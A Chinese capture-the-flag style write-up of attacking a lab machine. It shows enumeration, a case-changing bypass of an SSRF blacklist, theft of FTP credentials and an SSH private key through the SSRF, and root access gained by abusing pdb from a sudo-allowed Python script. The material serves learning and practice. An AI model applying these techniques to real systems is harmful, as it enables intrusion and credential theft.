迷糊的提权方式以及利用ssrf到最终提权靶机(一)

简介: 迷糊的提权方式以及利用ssrf到最终提权靶机

目标是国外靶场

打过才知道 学的知识太少了师傅们看看就行 大家都会 要是描述得不对的地方 求指点

本地环境:kali

首先是通过ssrf拿下的靶机

第一台

因为是连了vpn的所以可以直接扫目标ip:10.10.11.111拿到目标 只有ip 那就先扫端口nmap -v -sSV -Pn 10.10.11.111 -T4 -sC

没啥信息 只有80端口 那就打开web看看直接访问10.10.11.111

直接访问不了 添加host头

echo “10.10.11.111 forge.xxx” >> /etc/hosts

然后在次访问

能访问了 发现有个上传的地方

上传试试

发现重命名的后缀名 不解析 上传应该是没办法了 找找其他突破先扫扫目录 和子域名目录:gobuster dir -u http://forge.xxx/ -w /usr/share/wordlists/dirb/common.txt

f044aa99683f82fc229379a071e32b63_640_wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1.png

子域名:wfuzz -c -u “http://forge.xxx/“ -H “Host:FUZZ.forge.xxx” -w /usr/share/amass/wordlists/subdomains-top1mil-5000.txt

7a24f67da4acf65a8d249d1d0b698273_640_wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1.png

目录没扫出什么 扫到一个子域名 先进入看看还是不能直接访问 先加入到hostecho “10.10.11.111 admin.forge.xxx” >> /etc/hosts

提示只能本地访问

6849e5040115fd0dcbd017d733f12113_640_wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1.png

尝试加上X-Forwarded-For:127.0.0.1绕过失败。但是前面那个上传的地方 还有一个上传路径的地方

22054e2db2a8c236e331c54860d68027_640_wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1.png

但是直接上传会提示是黑名单地址

1f2f54c5968b57e24f009a593b220601_640_wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1.png

既然是黑名单 我们尝试绕过

3f730845089b25144631c1fac7c1cd5c_640_wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1.png

大小写绕过了:http://aDmin.forGe.xxx/然后访问页面发现报错

3df51762ee4b239e5754603d50094eda_640_wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1.png

然后通过抓返回包发现一个路径

fea8a952aaf604c37e848fe7eb5cba4e_640_wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1.png

然后继续通过ssrf访问这个路径 继续进行抓包http://aDmin.forGe.xxx/announcements

c5a3143b35499867551ac04742f96406_640_wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1.png

然后访问路径抓取返回包 获得了ftp的密码

4793a0d30514f358146a61eb02dc1415_640_wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1.png

user:heightofsecurity123!以及获取/upload目录API用法,u=urlhttp://aDmin.forGe.xxx/upload?u=url

然后结合起来读取ftpftp://user:heightofsecurity123!@FORGE.xxx

http://aDmin.forGe.xxx/upload?u=ftp://user:heightofsecurity123!@FORGE.xxx

0d5628175347005580ffb50d939db59c_640_wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1.png

然后继续bp抓返回包

02fde0e3b34669f8711d386d23de9a0e_640_wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1.png

可以成功访问到,也就是说我们现在可以利用ssrf读取系统文件了。user.txt在这就说明现在已经是用户家目录了。读取ssh私钥http://aDmin.forGe.xxx/upload?u=ftp://user:heightofsecurity123!@FORGE.xxx/.ssh/id_rsa

517cb6ba1c7bc04f97ecec4b873b48fb_640_wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1.png

用同样的方法读取

a93ea22c2eea9702679d282fcc8c3acb_640_wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1.png

然后保存id_rsa

397e7532e69dc9abed7f0ca6170e6db4_640_wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1.png

然后ssh连接ssh -i id_rsa user@10.10.11.111

452c7ad5443e0a6cc7ae16d458c940b5_640_wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1.png

成功连接上来

704b17253d62f1783df1e1dd939d1031_640_wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1.png

提权

sudo -l 发现一个不需要密码执行的py文件

08747a26e917a623da150ddd34649710_640_wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1.png

然后看下这个文件

284ed8a4b8ec3fda5720cf45e3f85bd3_640_wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1.png

发现是建立socket链接 监听40433端口 那就先执行这个py文件看看先执行py文件看看 然后在用nc连接

5627710dce004366810267259286bcb0_640_wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1.png

然后在随便输入的时候 发现会调用pdb调试pdb模式下是可以执行python代码的。于是直接给bash加上suid提权

7e60820a8e1bf6d503e4fe61ac81437c_640_wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1.png

pdb:pdb是The Python Debugger的缩写,为Python标准库的一个模块。该模块规定了一个Python程序交互式源代码调试器,支持设置断点,也支持源码级单步调试,栈帧监视,源代码列出,任意栈帧上下文的随机Python代码估值。

到此 这一台也就提权完毕


相关文章
|
安全 PHP Apache
记一次匈牙利服务器提权案例
记一次匈牙利服务器提权案例
85 0
|
5月前
|
安全 Shell PHP
一篇文章讲明白Kali学习笔记30:身份认证与命令执行漏洞
一篇文章讲明白Kali学习笔记30:身份认证与命令执行漏洞
21 0
|
开发框架 安全 .NET
记一次绕过安全狗和360提权案例
记一次绕过安全狗和360提权案例
160 0
|
安全 API 网络安全
绕过IIS命令执行防护提权
绕过IIS命令执行防护提权
146 0
|
安全 关系型数据库 MySQL
黑吃黑Getshell到提权实战案例
黑吃黑Getshell到提权实战案例
320 0
|
运维 关系型数据库 MySQL
绕过360安全卫士提权实战案例
绕过360安全卫士提权实战案例
395 1
|
XML 开发框架 安全
记一次后门爆破到提权实战案例
记一次后门爆破到提权实战案例
91 0
Potato土豆提权工具绕过防护思路-1
Potato土豆提权工具绕过防护思路-1
185 0
|
安全 Linux Windows
WEB漏洞-RCE代码及命令执行漏洞
WEB漏洞-RCE代码及命令执行漏洞
|
Shell 应用服务中间件 网络安全
迷糊的提权方式以及利用ssrf到最终提权靶机(三)
迷糊的提权方式以及利用ssrf到最终提权靶机
161 0
迷糊的提权方式以及利用ssrf到最终提权靶机(三)